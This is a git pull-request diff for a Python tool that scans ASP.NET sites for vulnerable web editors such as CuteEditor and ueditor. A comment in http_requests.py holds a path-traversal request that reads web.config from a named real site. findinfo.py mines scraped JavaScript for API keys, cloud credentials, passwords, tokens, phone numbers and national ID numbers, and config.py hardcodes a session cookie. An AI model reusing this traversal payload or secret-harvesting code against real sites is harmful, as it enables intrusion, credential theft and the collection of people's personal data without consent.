Merge pull request #1 from Hatanezumi/main

优化输出显示,为多进程添加新控制参数

.gitignore

@@ -0,0 +1,4 @@
+111.txt
+result.txt
+/__pycache__
+/.vscode

banner.txt

@@ -0,0 +1,10 @@
+"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
+ ____ __ ____ ____ ____ ______ _____ __ ____ ____ 
+ / ___/ / ]| \ | || \ | | / ___/ / ] / || \ 
+( \_ / / | D ) | | | o )| | _____ ( \_ / / | o || _ |
+ \__ | / / | / | | | _/ |_| |_|| | \__ | / / | || | |
+ / \ |/ \_ | \ | | | | | | |_____| / \ |/ \_ | _ || | |
+ \ |\ || . \ | | | | | | \ |\ || | || | |
+ \___| \____||__|\_||____||__| |__| \___| \____||__|__||__|__|
+
+""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" 

config.py

@@ -0,0 +1,43 @@
+import requests
+from urllib3.exceptions import InsecureRequestWarning
+from colorama import Fore, Style
+
+# 定义ANSI颜色代码
+class Color:
+ GREEN = "\\033[92m"
+ RESET = "\\033[0m"
+
+# 禁用不安全请求警告
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+# 设置全局默认最大重试次数和超时时间
+def set_request_defaults():
+ requests.adapters.DEFAULT_RETRIES = 1
+ requests.adapters.DEFAULT_TIMEOUT = 3
+
+# 图标
+def print_banner():
+ with open("banner.txt", "r") as file:
+ content = file.read()
+ colored_content = f"{Fore.GREEN}{content}{Style.RESET_ALL}"
+ print(colored_content)
+def print_help():
+ with open("help.txt", "r", encoding='utf-8') as file:
+ content = file.read()
+ colored_content = content
+ print(colored_content)
+
+custom_headers = {
+ "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0",
+ "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
+ "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
+ "Accept-Encoding": "gzip, deflate",
+ "Upgrade-Insecure-Requests": "1",
+ "Sec-Fetch-Dest": "document",
+ "Sec-Fetch-Mode": "navigate",
+ "Sec-Fetch-Site": "none",
+ "Sec-Fetch-User": "",
+ "Te": "trailers",
+ "Connection": "close",
+ "cookie":"TWFID=d2c3d09c522ed63e; ",
+ }

create_process.py

@@ -0,0 +1,48 @@
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+'''
+@Author : Hatanezumi
+@Contact : [email protected]
+@Desc : 本部分是对任务进行多进程的调配
+'''
+import os
+import url_scanner
+import multiprocessing
+from pathlib import Path
+from colorama import Fore, Style
+from tqdm import tqdm
+
+class Scanner():
+ def __init__(self, urls:list[str], proxy:str|None, max_cpu:int|None, force_cpu:int|None) -> None:
+ self.urls = urls
+ self.total = len(urls)
+ self.finish = 0
+ self.proxy = proxy
+ self.max_cpu = max_cpu
+ self.force_cpu = force_cpu
+ self.res_file_path = Path('result.txt')
+ def worker(self,args:tuple[str,str]) -> str:
+ return url_scanner.scan_urls(args[0],args[1])
+ def start(self) -> None:
+ cpu_count = multiprocessing.cpu_count()
+ cpu_count *= 5
+ cpu_count = self.max_cpu if self.max_cpu is not None and self.max_cpu <= cpu_count * 5 else cpu_count
+ cpu_count = self.force_cpu if self.force_cpu is not None else cpu_count
+ try:
+ with multiprocessing.Pool(cpu_count) as pool:
+ res_list = pool.imap_unordered(self.worker,[(i,self.proxy) for i in self.urls])
+ for res in tqdm(res_list, total=self.total, desc='当前进度'):
+ self.finish += 1
+ os.system(f'title 当前进度:{self.finish}/{self.total}')
+ res_text = ''.join(res) if len(res) != 1 else ''
+ with open(self.res_file_path,'a',encoding='utf-8') as file:
+ file.write(res_text)
+ except KeyboardInterrupt:
+ print(f'{Fore.GREEN}程序被终止,结果已保存到{self.res_file_path}{Fore.RESET}')
+ os.system('pause')
+
+def start(urls:list[str], proxy:str|None, max_cpu:str|None, force_cpu:str|None) -> None:
+ max_cpu = int(max_cpu) if max_cpu is not None else None
+ force_cpu = int(force_cpu) if force_cpu is not None else None
+ scanner = Scanner(urls,proxy=proxy,max_cpu=max_cpu,force_cpu=force_cpu)
+ scanner.start()

findinfo.py

@@ -0,0 +1,58 @@
+import json
+import re
+import requests
+import sys
+import os
+
+def scan_findinfo() -> list[str]:
+ headers = {
+ "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36"}
+
+ fileurl = "/findinfo/JS"
+
+ filemkdir = fileurl.split('_')[0]
+ if not os.path.exists(filemkdir):
+ os.makedirs(filemkdir)
+
+ #get path + 路径名称
+ paths = []
+ for dirpath, dirnames, filenames in os.walk('./' + filemkdir):
+ for file in filenames:
+ try:
+ with open("./" + filemkdir + "/" + file, "r", encoding='gb18030', errors='ignore') as f2:
+ lines = f2.readlines()
+ for line in lines:
+ line = line.strip('\n').strip('\t')
+ matches = re.findall(r'(?i)((access_key|username|user|jwtkey|jwt_key|AESKEY|AES_KEY|appsecret|app_secret|access_token|password|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api\.googlemaps\s+AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc\ password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_key|cloudinary_api_secret|cloudinary_name|codecov_token|config|conn\.login|connectionstring|consumer_key|consumer_secret|credentials|cypress_record_key|database_password|database_schema_test|datadog_api_key|datadog_app_key|db_password|db_server|db_username|dbpasswd|dbpassword|dbuser|deploy_password|digitalocean_ssh_key_body|digitalocean_ssh_key_ids|docker_hub_password|docker_key|docker_pass|docker_passwd|docker_password|dockerhub_password|dockerhubpassword|dot-files|dotfiles|droplet_travis_password|dynamoaccesskeyid|dynamosecretaccesskey|elastica_host|elastica_port|elasticsearch_password|encryption_key|encryption_password|env\.heroku_api_key|env\.sonatype_password|eureka\.awssecretkey)\s*[:=><]{1,2}\s*[\"\']{0,1}([0-9a-zA-Z\-_=+/]{8,64})[\"\']{0,1})', line)
+ for match in matches:
+ paths.append(file + "---" + str(match[0]))
+
+ matches = re.findall(r'''(['"]\s*(?:GOOG[\w\W]{10,30}|AZ[A-Za-z0-9]{34,40}|AKID[A-Za-z0-9]{13,20}|AKIA[A-Za-z0-9]{16}|IBM[A-Za-z0-9]{10,40}|OCID[A-Za-z0-9]{10,40}|LTAI[A-Za-z0-9]{12,20}|AK[\w\W]{10,62}|AK[A-Za-z0-9]{10,40}|AK[A-Za-z0-9]{10,40}|UC[A-Za-z0-9]{10,40}|QY[A-Za-z0-9]{10,40}|KS3[A-Za-z0-9]{10,40}|LTC[A-Za-z0-9]{10,60}|YD[A-Za-z0-9]{10,60}|CTC[A-Za-z0-9]{10,60}|YYT[A-Za-z0-9]{10,60}|YY[A-Za-z0-9]{10,40}|CI[A-Za-z0-9]{10,40}|gcore[A-Za-z0-9]{10,30})\s*['"])''', line)
+ for match in matches:
+ paths.append(file + "---" + str(match))
+
+ matches = re.findall(r'[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}', line)
+ for match in matches:
+ paths.append(file + "---" + str(match))
+
+ matches = re.findall(r'(?<!\d)(13\d{9}|14[579]\d{8}|15[^4\D]\d{8}|166\d{8}|17[^49\D]\d{8}|18\d{9}|19[189]\d{8})(?!\d)', line)
+ for match in matches:
+ paths.append(file + "---" + str(match))
+
+ matches = re.findall(r'\b\d{17}[\dXx]|\b\d{14}\d{1}|\b\d{17}[\dXx]', line)
+ for match in matches:
+ paths.append(file + "---" + str(match))
+
+ matches = re.findall(r'\d+\.\d+\.\d+\.\d+', line)
+ for match in matches:
+ paths.append(file + "---" + str(match))
+ except Exception as e:
+ print("发生错误")
+
+
+ for var in (vars := sorted(set(paths))):
+ with open(fileurl + '_path.txt', "a+", encoding='gb18030', errors='ignore') as paths_file:
+ paths_file.write(var + '\n')
+ # 打印当前路径到终端并设置颜色为黄色
+ print('\033[33m' + var + '\033[0m')
+ return vars

help.txt

@@ -0,0 +1,7 @@
+
+特别声明：该脚本目前只针对于ASP.NET的站点
+目前支持扫描的编辑器有 
+kindeditor ueditor fckeditor ckeditor ckfinder Cuteditor
+多进程是根据cpu核心数量开启的,可以通过-c来设定进程数量但不能超过cpu核心数,也可以通过--force_cpu来强制设定进程数量
+感谢JSfinder模块的技术支持：L@2uR1te 师傅
+本人QQ：1723680383

http_requests.py

@@ -0,0 +1,14 @@
+import requests
+
+def send_http_request(url, verify=False, timeout=5, headers=None, proxy=None):
+ try:
+ proxies = {"http": proxy, "https": proxy} if proxy else None
+ response = requests.get(url, verify=verify, timeout=timeout, proxies=proxies)
+ return response
+ except requests.exceptions.RequestException as e:
+ return None
+
+# 示例用法
+#url = "https://funbox.com.tw/CuteSoft_Client/CuteEditor/Load.ashx?type=image&file=../../../web.config"
+#response = send_http_request(url)
+#print(response.text)

js-finder/2.py

@@ -0,0 +1,73 @@
+import requests
+from bs4 import BeautifulSoup
+from urllib.parse import urlparse, urljoin
+
+# 定义JS文件规则列表
+js_rules = [
+ "RSA.js",
+ # 添加更多规则
+]
+
+# 设置控制目录级别的变量
+max_directory_levels = 4
+
+def get_js_paths(url):
+ try:
+ # 发送GET请求获取网页内容
+ response = requests.get(url)
+ response.raise_for_status()
+
+ # 使用BeautifulSoup解析HTML
+ soup = BeautifulSoup(response.text, 'html.parser')
+
+ # 获取主机名
+ host = urlparse(url).hostname
+
+ # 提取每个script标签中的src属性
+ js_paths = [tag.get('src') for tag in soup.find_all('script')]
+
+ # 过滤JavaScript文件的路径并提取文件路径部分
+ filtered_js_paths = []
+ outputted_dirs = set() # 存储已输出的不匹配目录路径
+
+ for path in js_paths:
+ if not path:
+ continue
+ if not urlparse(path).hostname:
+ # 处理相对路径
+ path = urljoin(url, path)
+ if urlparse(path).hostname == host:
+ # 提取文件路径部分
+ path = urlparse(path).path
+ filtered_js_paths.append(path)
+
+ # 打印所有JavaScript文件的路径
+ for path in filtered_js_paths:
+ # 检查是否在JS文件规则列表中
+ matching_rule = None
+ for rule in js_rules:
+ if rule in path:
+ matching_rule = rule
+ break
+
+ if matching_rule:
+ print("JavaScript文件路径:", path)
+ print("发现匹配的规则:", matching_rule)
+ else:
+ # 修改部分，限制不匹配的JavaScript目录路径的最多指定级别
+ directory_parts = path.split('/')[:-1]
+ if len(directory_parts) > max_directory_levels:
+ directory_parts = directory_parts[:max_directory_levels]
+ directory_path = '/'.join(directory_parts) + '/'
+ if directory_path not in outputted_dirs:
+ print("不匹配的JavaScript目录路径:", directory_path)
+ outputted_dirs.add(directory_path)
+
+ except requests.exceptions.RequestException as e:
+ print("请求错误:", e)
+ except Exception as e:
+ print("发生错误:", e)
+
+if __name__ == "__main__":
+ url = input("请输入网站的URL: ")
+ get_js_paths(url)